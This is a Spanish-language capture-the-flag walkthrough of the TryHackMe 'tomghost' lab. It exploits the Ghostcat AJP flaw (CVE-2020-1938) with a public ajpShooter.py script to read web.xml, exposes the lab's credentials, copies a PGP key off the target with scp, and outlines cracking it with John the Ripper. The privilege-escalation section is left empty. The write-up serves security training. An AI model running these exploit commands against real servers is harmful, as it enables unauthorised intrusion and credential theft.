arrows-to-circletomghost (ajp13)

8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)

Exploit:

searchsploit ajp

Ghostcat CVE-2020-1938arrow-up-right.

git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487
cd Ghostcat

Ejecutaste el exploit ajpShooter.py:

python3 ajpShooter.py http://10.10.84.159:8080 8009 /WEB-INF/web.xml read
skyfuck:8730281lkjlkjdqlksalks

Una vez tenemos user

Para ESCALAR PRIVILEGIOS tenemos que descargar los archivos que tiene la maquina victima y poder leerlos en vuestra maquina:

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
┌──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ scp skyfuck@10.10.202.58:/home/skyfuck/tryhackme.asc .

skyfuck@10.10.202.58's password: 
tryhackme.asc                                                         100% 5144    13.6KB/s   00:00    
                                                                                                        
┌──(docker㉿docker)-[~/Tryhackme/Ghostcat-CNVD-2020-10487]
└─$ ls
README.md  ajp-execute.png  ajp-read.png  ajp-save.png  ajpShooter.py  tryhackme.asc
  • Usaremos JohnTheRipper para descifrar este archivo de clave. Pero primero, necesitamos generar el hash de este archivo de clave, que luego descifraremos mediante fuerza bruta.

  • Lo pasamos a hash

  • Despues utilizamos jhon

Escalada de privilegios

  1. Enumeraste permisos de sudo para merlin:

    Resultado:

Comando:

Last updated